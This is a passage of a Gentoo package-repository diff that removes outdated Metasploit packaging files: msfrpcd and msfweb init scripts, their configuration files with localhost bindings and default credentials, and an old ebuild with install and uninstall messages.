576 diff --git a/net-analyzer/metasploit/files/msfrpcd-4.2-conf b/net-analyzer/metasploit/files/msfrpcd-4.2-conf
577 deleted file mode 100644
578 index dc56a9d..0000000
579 --- a/net-analyzer/metasploit/files/msfrpcd-4.2-conf
580 +++ /dev/null
581 @@ -1,25 +0,0 @@
582 -# Config file for /etc/init.d/msfrpcd
583 -
584 -# msfrpcd -h for more info
585 -
586 -# Bind to the following IP instead of 0.0.0.0
587 -MSF_OPTS="-a 127.0.0.1"
588 -
589 -# Bind to the following TCP port instead of default 55553
590 -#MSF_OPTS="${MSF_OPTS} -p 55553"
591 -
592 -# Specify the username to access msfrpcd
593 -MSF_OPTS="${MSF_OPTS} -U msf"
594 -
595 -# Specify the password to access msfrpcd
596 -MSF_OPTS="${MSF_OPTS} -P secret"
597 -
598 -# Server type, [Basic|Web]
599 -#MSF_OPTS="${MSF_OPTS} -t Basic"
600 -
601 -# URI for Web server
602 -#MSF_OPTS="${MSF_OPTS} -u "
603 -
604 -# Disable SSL on the XMLRPC socket
605 -# JAVA GUI doesn't support SSL as of Nov 6, 2010
606 -MSF_OPTS="${MSF_OPTS} -S"
607
608 diff --git a/net-analyzer/metasploit/files/msfrpcd-4.2-initd b/net-analyzer/metasploit/files/msfrpcd-4.2-initd
609 deleted file mode 100644
610 index 91a373f..0000000
611 --- a/net-analyzer/metasploit/files/msfrpcd-4.2-initd
612 +++ /dev/null
613 @@ -1,22 +0,0 @@
614 -#!/sbin/runscript
615 -# Copyright 1999-2012 Gentoo Foundation
616 -# Distributed under the terms of the GNU General Public License v2
617 -# $Id$
618 -
619 -VERSION=4.2
620 -PIDFILE=/var/run/msfrpcd${VERSION}.pid
621 -
622 -start() {
623 - ebegin "Starting msfrpcd${VERSION}"
624 - start-stop-daemon --start --quiet --background \
625 - --exec /usr/lib/metasploit${VERSION}/msfrpcd \
626 - --pidfile ${PIDFILE} \
627 - --make-pidfile -- -f ${MSF_OPTS}
628 - eend $?
629 -}
630 -
631 -stop() {
632 - ebegin "Stopping msfrpcd${VERSION}"
633 - start-stop-daemon --stop --quiet -s 9 --pidfile ${PIDFILE}
634 - eend $?
635 -}
636
637 diff --git a/net-analyzer/metasploit/files/msfrpcd-4.3-conf b/net-analyzer/metasploit/files/msfrpcd-4.3-conf
638 deleted file mode 100644
639 index dc56a9d..0000000
640 --- a/net-analyzer/metasploit/files/msfrpcd-4.3-conf
641 +++ /dev/null
642 @@ -1,25 +0,0 @@
643 -# Config file for /etc/init.d/msfrpcd
644 -
645 -# msfrpcd -h for more info
646 -
647 -# Bind to the following IP instead of 0.0.0.0
648 -MSF_OPTS="-a 127.0.0.1"
649 -
650 -# Bind to the following TCP port instead of default 55553
651 -#MSF_OPTS="${MSF_OPTS} -p 55553"
652 -
653 -# Specify the username to access msfrpcd
654 -MSF_OPTS="${MSF_OPTS} -U msf"
655 -
656 -# Specify the password to access msfrpcd
657 -MSF_OPTS="${MSF_OPTS} -P secret"
658 -
659 -# Server type, [Basic|Web]
660 -#MSF_OPTS="${MSF_OPTS} -t Basic"
661 -
662 -# URI for Web server
663 -#MSF_OPTS="${MSF_OPTS} -u "
664 -
665 -# Disable SSL on the XMLRPC socket
666 -# JAVA GUI doesn't support SSL as of Nov 6, 2010
667 -MSF_OPTS="${MSF_OPTS} -S"
668
669 diff --git a/net-analyzer/metasploit/files/msfrpcd-4.4-initd b/net-analyzer/metasploit/files/msfrpcd-4.4-initd
670 deleted file mode 100644
671 index 4880d50..0000000
672 --- a/net-analyzer/metasploit/files/msfrpcd-4.4-initd
673 +++ /dev/null
674 @@ -1,22 +0,0 @@
675 -#!/sbin/runscript
676 -# Copyright 1999-2012 Gentoo Foundation
677 -# Distributed under the terms of the GNU General Public License v2
678 -# $Id$
679 -
680 -VERSION=4.3
681 -PIDFILE=/var/run/msfrpcd${VERSION}.pid
682 -
683 -start() {
684 - ebegin "Starting msfrpcd${VERSION}"
685 - start-stop-daemon --start --quiet --background \
686 - --exec /usr/lib/metasploit${VERSION}/msfrpcd \
687 - --pidfile ${PIDFILE} \
688 - --make-pidfile -- -f ${MSF_OPTS}
689 - eend $?
690 -}
691 -
692 -stop() {
693 - ebegin "Stopping msfrpcd${VERSION}"
694 - start-stop-daemon --stop --quiet -s 9 --pidfile ${PIDFILE}
695 - eend $?
696 -}
697
698 diff --git a/net-analyzer/metasploit/files/msfweb.confd b/net-analyzer/metasploit/files/msfweb.confd
699 deleted file mode 100644
700 index 3e9fa64..0000000
701 --- a/net-analyzer/metasploit/files/msfweb.confd
702 +++ /dev/null
703 @@ -1,13 +0,0 @@
704 -# Config file for /etc/init.d/metasploit
705 -
706 -# Pidfile
707 -PIDFILE=/var/run/msfweb.pid
708 -
709 -# Bind to the following IP instead of the loopback address
710 -IPADDR=127.0.0.1
711 -
712 -# Bind to the following TCP port instead of default 55555
713 -PORT=55555
714 -
715 -# All options
716 -MSF_OPTS="-a $IPADDR -p $PORT"
717
718 diff --git a/net-analyzer/metasploit/files/msfweb.initd b/net-analyzer/metasploit/files/msfweb.initd
719 deleted file mode 100644
720 index 0805d58..0000000
721 --- a/net-analyzer/metasploit/files/msfweb.initd
722 +++ /dev/null
723 @@ -1,18 +0,0 @@
724 -#!/sbin/runscript
725 -# Copyright 1999-2005 Gentoo Foundation
726 -# Distributed under the terms of the GNU General Public License v2
727 -# $Id$
728 -
729 -start() {
730 - ebegin "Starting msfweb"
731 - start-stop-daemon --start --quiet --background --exec /usr/bin/msfweb \
732 - --pidfile ${PIDFILE} --make-pidfile -- ${MSF_OPTS}
733 - eend $?
734 -}
735 -
736 -stop() {
737 - ebegin "Stopping msfweb"
738 - start-stop-daemon --stop --quiet --pidfile ${PIDFILE}
739 - rm -f ${PIDFILE}
740 - eend $?
741 -}
742
743 diff --git a/net-analyzer/metasploit/metasploit-2.7.ebuild b/net-analyzer/metasploit/metasploit-2.7.ebuild
744 deleted file mode 100644
745 index ed11d9b..0000000
746 --- a/net-analyzer/metasploit/metasploit-2.7.ebuild
747 +++ /dev/null
748 @@ -1,48 +0,0 @@
749 -# Copyright 1999-2012 Gentoo Foundation
750 -# Distributed under the terms of the GNU General Public License v2
751 -# $Id$
752 -
753 -MY_P="${P/metasploit/framework}"
754 -S="${WORKDIR}/${MY_P}"
755 -DESCRIPTION="Advanced open-source framework for developing, testing, and using vulnerability exploit code"
756 -HOMEPAGE="http://www.metasploit.org/"
757 -SRC_URI="http://metasploit.com/tools/${MY_P}.tar.gz"
758 -
759 -LICENSE="GPL-2 Artistic"
760 -SLOT="0"
761 -KEYWORDS="amd64 ppc x86"
762 -IUSE=""
763 -
764 -RDEPEND="dev-lang/perl
765 - dev-perl/Net-SSLeay
766 - dev-perl/Term-ReadLine-Perl
767 - dev-perl/TermReadKey"
768 -
769 -src_install() {
770 - dodir /usr/lib/
771 - dodir /usr/bin/
772 -
773 - # should be as simple as copying everything into the target...
774 - cp -pPR "${S}" "${D}"usr/lib/metasploit || die
775 -
776 - # and creating symlinks in the /usr/bin dir
777 - cd "${D}"/usr/bin
778 - ln -s ../lib/metasploit/msf* ./ || die
779 - chown -R root:0 "${D}"
780 -
781 - newinitd "${FILESDIR}"/msfweb.initd msfweb || die "newinitd failed"
782 - newconfd "${FILESDIR}"/msfweb.confd msfweb || die "newconfd failed"
783 -}
784 -
785 -pkg_postinst() {
786 - elog "To update metasploit modules run:"
787 - elog " # cd /usr/lib/metasploit && svn update"
788 -}
789 -
790 -pkg_postrm() {
791 - if [[ -d /usr/lib/metasploit ]] ; then
792 - ewarn "If you ever updated modules emerge will keep /var/lib/metasploit"
793 - ewarn "directory. Thus to remove metasploit completely do not forgive to:"
794 - ewarn " # rm -r /usr/lib/metasploit"
795 - fi
796 -}